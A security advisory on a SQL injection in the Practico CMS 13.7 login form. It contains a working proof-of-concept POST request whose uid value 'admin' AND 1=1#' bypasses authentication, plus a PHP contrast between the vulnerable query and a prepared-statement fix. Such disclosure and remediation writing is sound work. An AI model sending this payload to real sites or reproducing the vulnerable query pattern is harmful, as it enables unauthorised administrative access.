Practico CMS "uid" SQL Injection Vulnerability
Published: 2013-09-16
Updated: 2013-09-19
Affected systems:
Practico CMS 13.x
Description:
--------------------------------------------------------------------------------
Practico CMS is a visual framework for rapidly building web applications.
Practico CMS 13.7 does not properly validate the uid parameter of index.php (when "accion" is set to "Iniciar_login") before using it in a SQL query. By injecting arbitrary SQL code, an attacker can manipulate the SQL query.
<*Source: shiZheni*>
Test method:
--------------------------------------------------------------------------------
Warning
The following programs (methods) may be offensive in nature and are provided for security research and teaching purposes only. Use at your own risk!
############################################################
# ______ __ __ _____ ______ __ __ ____ __ __ _____
# |____ | | | | | |_ __| | ___| | | | | | | | \ | | |__ __|
# / / | | | | | | \ \ | | | | | __| | \ | | | |
# / / | |__| | | | \ \ | |__| | | |__ | \ | | | |
# / / | __ | | | \ \ | __ | | __| | \ | | | |
# / /___ | | | | __| |__ ___\ \ | | | | | |__ | | \ \| | __| |__
# |______| |__| |__| |______| |_____ | |__| |__| |____| |__| \___ | |_____ |
#
############################################################
# Exploit Title: Practico Login SQL Injection
# Date: 2013 - 08 - 12
# Exploit Author: shiZheni
# Software Link: http://www.codigoabierto.org/
# Software Download Link : http://sourceforge.net/projects/practico/files/
# Version: 13.7
# Affected Version : 13.7 < and Last
# Tested on: Windows 7 and PHP 5.3.15
==================================================
#1 [ SQLi] Login - Admin ( Total Access )
POST /demo/practico/ HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 73
Referer: http://localhost/demo/practico/
Host: localhost
Connection: keep-alive
Accept-Encoding: gzip, deflate
accion=Iniciar_login&uid=admin%27+AND+1%3D1%23&clave=password&captcha=mrr6
This vulnerability gives you total access and control in the CMS.
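The root cause described above and demonstrated by the request in the test method (the uid field of an Iniciar_login request reaching the SQL text unescaped) is shown here as an added PHP example. This is not Practico's own code: the table and column names (usuarios, uid, clave_hash), the database credentials and the surrounding dispatch logic are assumptions, and the hardened version assumes PHP 5.5 or later for password_verify(). The vulnerable function is kept only for contrast with the prepared-statement version.

```php
<?php
// Added example, not Practico's code. Table/column names, credentials and
// the PHP >= 5.5 requirement (password_verify) are assumptions.

// Vulnerable pattern: the request's uid and clave fields are spliced into the
// SQL text. With the advisory's input uid = "admin' AND 1=1#", the quoted
// string is closed early and, in MySQL, everything after "#" (including the
// password comparison) is treated as a comment.
function login_vulnerable(PDO $db, $uid, $clave)
{
    $sql = "SELECT id FROM usuarios WHERE uid = '$uid' AND clave = '$clave'";
    return $db->query($sql)->fetch(PDO::FETCH_ASSOC);
}

// Hardened pattern: a bound placeholder keeps uid as data, so the same input is
// compared literally against the column and matches no account. The password is
// checked against a stored hash in PHP rather than inside the query.
function login_hardened(PDO $db, $uid, $clave)
{
    $stmt = $db->prepare('SELECT id, clave_hash FROM usuarios WHERE uid = :uid');
    $stmt->bindValue(':uid', $uid, PDO::PARAM_STR);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    if ($row === false || !password_verify($clave, $row['clave_hash'])) {
        return false;
    }
    return (int) $row['id'];
}

// Connection with server-side prepared statements (emulation disabled) and
// exceptions on error, so a malformed query fails closed instead of silently.
$db = new PDO('mysql:host=localhost;dbname=practico_example;charset=utf8',
    'dbuser', 'dbpass', array(
        PDO::ATTR_ERRMODE          => PDO::ERRMODE_EXCEPTION,
        PDO::ATTR_EMULATE_PREPARES => false,
    ));

// Dispatch mirroring the advisory's request: accion=Iniciar_login with uid/clave.
if (isset($_POST['accion']) && $_POST['accion'] === 'Iniciar_login') {
    $uid   = isset($_POST['uid'])   ? $_POST['uid']   : '';
    $clave = isset($_POST['clave']) ? $_POST['clave'] : '';

    $userId = login_hardened($db, $uid, $clave);
    if ($userId === false) {
        http_response_code(401);
        echo 'Login failed';
    } else {
        session_start();
        session_regenerate_id(true);
        $_SESSION['user_id'] = $userId;
        echo 'Login ok';
    }
}
```

The practical check is that the request body from the test method, sent to the hardened handler, produces a 401 rather than a session: the bound value never changes the statement's structure. Escaping with a quoting function would also defuse this particular payload, but prepared statements remove the class of bug rather than one input, which is why they are the recommended fix for the pattern this advisory describes.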
Recommendation:
--------------------------------------------------------------------------------
Vendor patch:
Practico CMS
------------
The vendor has not yet released a patch or upgrade. We recommend that users of this software monitor the vendor's homepage for the latest version: